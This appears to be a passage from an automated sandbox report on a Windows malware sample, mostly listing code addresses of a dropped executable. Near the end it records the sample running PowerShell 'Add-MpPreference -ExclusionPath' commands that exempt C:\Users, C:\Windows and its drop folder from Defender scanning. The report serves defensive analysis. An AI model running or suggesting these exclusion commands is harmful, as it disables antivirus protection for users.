Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042CB41	14_2_0042CB41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00432B51	14_2_00432B51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AB61	14_2_0040AB61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408B01	14_2_00408B01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EB01	14_2_0040EB01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EBC1	14_2_0040EBC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408BC1	14_2_00408BC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CBF1	14_2_0040CBF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412B81	14_2_00412B81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410B91	14_2_00410B91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412C51	14_2_00412C51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AC61	14_2_0040AC61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408CE1	14_2_00408CE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CD41	14_2_0040CD41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AD51	14_2_0040AD51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00414D61	14_2_00414D61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042CD61	14_2_0042CD61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408D71	14_2_00408D71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410D11	14_2_00410D11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040ED31	14_2_0040ED31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EDD1	14_2_0040EDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EE71	14_2_0040EE71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AE11	14_2_0040AE11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408E11	14_2_00408E11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CE31	14_2_0040CE31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410EA1	14_2_00410EA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410F41	14_2_00410F41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EF51	14_2_0040EF51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AF51	14_2_0040AF51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408F11	14_2_00408F11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CF31	14_2_0040CF31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042CFE1	14_2_0042CFE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CFF1	14_2_0040CFF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F051	14_2_0040F051
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411071	14_2_00411071
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409001	14_2_00409001
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B031	14_2_0040B031
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B0D1	14_2_0040B0D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004090E1	14_2_004090E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D091	14_2_0040D091
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411141	14_2_00411141
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042D171	14_2_0042D171
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F111	14_2_0043F111
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F121	14_2_0040F121
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443131	14_2_00443131
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F1D1	14_2_0040F1D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004431D1	14_2_004431D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042B1E1	14_2_0042B1E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409181	14_2_00409181
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D251	14_2_0040D251
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411231	14_2_00411231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409231	14_2_00409231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F2C1	14_2_0040F2C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004112D1	14_2_004112D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B2E1	14_2_0040B2E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443291	14_2_00443291
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409351	14_2_00409351
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443361	14_2_00443361
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B371	14_2_0040B371
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D301	14_2_0040D301
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F311	14_2_0043F311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042B321	14_2_0042B321
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042D3C1	14_2_0042D3C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D3D1	14_2_0040D3D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413381	14_2_00413381
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F3B1	14_2_0040F3B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443431	14_2_00443431
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004434F1	14_2_004434F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F481	14_2_0043F481
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004094A1	14_2_004094A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B4A1	14_2_0040B4A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413561	14_2_00413561
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409561	14_2_00409561
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D501	14_2_0040D501
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411511	14_2_00411511
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B5E1	14_2_0040B5E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F591	14_2_0040F591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F591	14_2_0043F591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443591	14_2_00443591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D5B1	14_2_0040D5B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F651	14_2_0043F651
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443671	14_2_00443671
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413601	14_2_00413601
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411621	14_2_00411621
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F631	14_2_0040F631
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042D6C1	14_2_0042D6C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D6E1	14_2_0040D6E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F6F1	14_2_0043F6F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B681	14_2_0040B681
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042B691	14_2_0042B691
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004096B1	14_2_004096B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411741	14_2_00411741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F741	14_2_0040F741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443741	14_2_00443741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413711	14_2_00413711
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B7C1	14_2_0040B7C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F7E1	14_2_0043F7E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004437E1	14_2_004437E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F7F1	14_2_0040F7F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004097B1	14_2_004097B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D801	14_2_0040D801
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F8C1	14_2_0040F8C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004098D1	14_2_004098D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F8D1	14_2_0043F8D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B8E1	14_2_0040B8E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D8F1	14_2_0040D8F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042D8F1	14_2_0042D8F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411881	14_2_00411881
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004438A1	14_2_004438A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413961	14_2_00413961
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F971	14_2_0043F971
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004119D1	14_2_004119D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004139F1	14_2_004139F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D9F1	14_2_0040D9F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004099F1	14_2_004099F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F981	14_2_0040F981
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443981	14_2_00443981
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411A71	14_2_00411A71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BA01	14_2_0040BA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FA01	14_2_0043FA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042DA01	14_2_0042DA01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042DAC1	14_2_0042DAC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BAF1	14_2_0040BAF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409A81	14_2_00409A81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FAA1	14_2_0043FAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BAA1	14_2_0042BAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413B01	14_2_00413B01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DB01	14_2_0040DB01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411B31	14_2_00411B31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411BD1	14_2_00411BD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DBD1	14_2_0040DBD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413BE1	14_2_00413BE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BB81	14_2_0040BB81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409BA1	14_2_00409BA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BBB1	14_2_0042BBB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BC51	14_2_0042BC51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411C71	14_2_00411C71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BC71	14_2_0040BC71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040FC31	14_2_0040FC31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409CC1	14_2_00409CC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DC81	14_2_0040DC81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FC91	14_2_0043FC91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413D11	14_2_00413D11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BD11	14_2_0040BD11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DD31	14_2_0040DD31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FD31	14_2_0043FD31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DDD1	14_2_0040DDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FDD1	14_2_0043FDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BDE1	14_2_0042BDE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409DF1	14_2_00409DF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00403D81	14_2_00403D81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411D91	14_2_00411D91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BDB1	14_2_0040BDB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043FE61	14_2_0043FE61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411E31	14_2_00411E31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042BED1	14_2_0042BED1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BE81	14_2_0040BE81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DE81	14_2_0040DE81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00447F4F	14_2_00447F4F
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040BF71	14_2_0040BF71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040DFD1	14_2_0040DFD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409FA1	14_2_00409FA1

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe 36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC

Sample file is different than original file name gathered from version info

Source: YYjRtxS70h.exe, 00000000.00000000.1485142901.0000000000652000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe	Binary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe

Source: classification engine

Classification label: mal88.evad.winEXE@21/24@4/5

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fimw0nw.epw.ps1

Jump to behavior

Source: YYjRtxS70h.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: YYjRtxS70h.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: YYjRtxS70h.exe	Virustotal: Detection: 62%
Source: YYjRtxS70h.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\YYjRtxS70h.exe "C:\Users\user\Desktop\YYjRtxS70h.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"	Jump to behavior
